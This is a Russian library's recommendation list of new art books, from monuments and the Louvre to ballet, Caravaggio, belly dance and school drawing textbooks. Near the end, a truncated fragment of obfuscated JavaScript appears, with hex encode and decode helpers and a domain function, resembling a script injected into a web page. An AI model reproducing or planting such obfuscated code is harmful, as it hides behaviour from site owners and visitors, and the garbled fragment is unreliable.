Несомненно, что искусство играет большую роль в жизни человеческого общества. Мир без искусства не был бы таким ярким, красочным и добрым. Центральная городская библиотека им. Ю.Н. Либединского приглашает окунуться в чарующий мир живописи, архитектуры, скульптуры, балета и танца, о котором расскажут книги из нового поступления:
Самин, Д. К. Сто великих памятников / Д. К. Самин. — М.: Вече, 2002. — 480 с.
Ничто не может лучше характеризовать различные эпохи мировой истории, чем памятники, которые созданы руками гениальных скульпторов и архитекторов. И не важно, знаем мы их имена или нет.
Книга «100 великих памятников» рассказывает о самых выдающихся памятниках: от Сфинкса и Венеры Милосской до Триумфальной арки в Париже и памятника «Тысячелетие России».
Лувр I. — М.: АРИА-АиФ, 2011. — 80 с.: ил. — (Музеи мира).
Лувр — один из крупнейших музеев в мире. Его история восходит к Средним векам, и он постоянно преображался. Недавно завершились последние работы по реконструкции Лувра. И если всего несколько лет назад музей символизировала статуя Ники Самофракийской, возвышающаяся над величественными лестницами, то сейчас символом музея служит огромный центральный двор со стеклянной пирамидой.
По коллекции Лувра можно изучать историю западноевропейской живописи: так богато собрание полотен, многие из которых — тоже признанные шедевры. Автор сумел объяснить многие особенности стилей, свойственные живописцам, полотна которых находятся в музее, рассказал о трудностях, с которыми они сталкивались в жизни и творчестве. Читателю будет интересно узнать, как они преодолевались, как художники выходили на те позиции в живописи, которые обессмертили их имена.
Демидов, А. П. «Лебединое озеро» / А. Демидов. — М.: Искусство, 1985. — 366 с.: ил. — (Шедевры балета).
В книге Александра Павловича Демидова «Лебединое озеро» излагается история создания первого балета П. И. Чайковского и его сценическая история на русской сцене. Подробно анализируется постановка «Лебединого озера» в Большом театре при жизни Чайковского балетмейстером Рейзингером и позднейшие его постановки Петипа, Горским, Вагановой, Лопуховым, Бурмейстером, Григоровичем.
Книга богато иллюстрирована.
Микеланжело Меризи да Караваджо / ред. А. Барагамян ; автор текста Кононенко Р. — М.: Директ-Медиа, 2010. — 48 с. : цв.ил. — (Великие художники).
Двенадцатый том цикла Великие художники посвящен одному из самых талантливых живописцев мирового искусства Микеланджело Меризи да Караваджо. Караваджо, представитель итальянского барокко, был основоположником реализма в живописи Европы XVII века. Его картины на религиозные темы кардинально отличались от картин современников — святые у Караваджо не парят в небесах, а твердо стоят на земле, его типажи подчеркнуто простонародны. Это не могло не поставить живописца в оппозицию к искусству того времени.
Цыганкова, Р. Школа восточного танца / Р.Цыганкова. — Ростов-н/Д: Феникс, 2006. — 156с.: ил. — (Это модно).
Уникальный по технике, чувственный и чарующий, восточный танец живота олицетворяет саму жизнь, сочетая в себе здоровье, удовольствие и красоту. Эта книга дает вам прекрасный шанс овладеть таким танцем. Не упустите его! Тогда каждую весну ваша душа будет зеленеть, словно юная травка, летом — цвести, подобно лотосу из тысячи лепестков, осенью — закружит вас в золотом вихре, а зимой согреет и убаюкает сладкими сказками о новой весне…
Книга дает подробное описание выполнения базовых движений, «восьмерок» — горизонтальных, вертикальных, с выбросом ноги, различных трясок, ударов животом, волны, движений рук и многое другое, а главное — дает связки из этих движений, чтобы в результате получился законченный восточный танец.
Сокольникова, Н. М. Изобразительное искусство. Ч. 1. Основы рисунка: учебник для учащихся 5-8 классов / Н. М. Сокольникова. — Обнинск: Титул, 1998. — 96 с.
Книга «Основы рисунка» рассматривает рисунок как основу всех пластических искусств. Она включает изучение вопросов формообразования, передачи объема, пропорций, перспективы. Учащиеся освоят азбуку рисунка в процессе практических заданий по рисованию портрета и фигуры человека, разнообразных натюрмортов, пейзажей и тематических композиций. В конце книги помещены: ответы на трудные вопросы, «секреты и тайны» мастеров изобразительного искусства и рекомендуемая литература.
Сокольникова, Н. М. Изобразительное искусство. Ч. 2. Основы живописи: учебник для учащихся 5-8 классов / Н. М. Сокольникова. — Обнинск: Титул, 1998. — 80 с.
Книга «Основы живописи» построена на том, что живопись является искусством цвета. В ней рассматриваются основы науки о цвете, особое внимание уделяется вопросам восприятия цвета. Учебник содержит специальную систему визуальных знаков, которые помогут ребенку лучше ориентироваться в материале учебника, и большое количество иллюстраций.
Сокольникова, Н. М. Изобразительное искусство. Ч. 3. Основы композиции: учебник для учащихся 5-8 классов / Н. М. Сокольникова. — Обнинск: Титул, 1998. — 80 с.
Книга «Основы композиции» знакомит с базовыми принципами композиции, ее правилами, приемами и средствами. На основе многочисленных примеров из истории живописи рассматриваются разнообразные композиционные схемы и типы композиций. Учащимся предлагаются провести эксперименты, выполнить упражнения и творческие задания разнообразными живописными средствами.
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «miasslib.ru»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e
Библиотека рекомендует / ЦГБ им. Ю.Н. Либединского |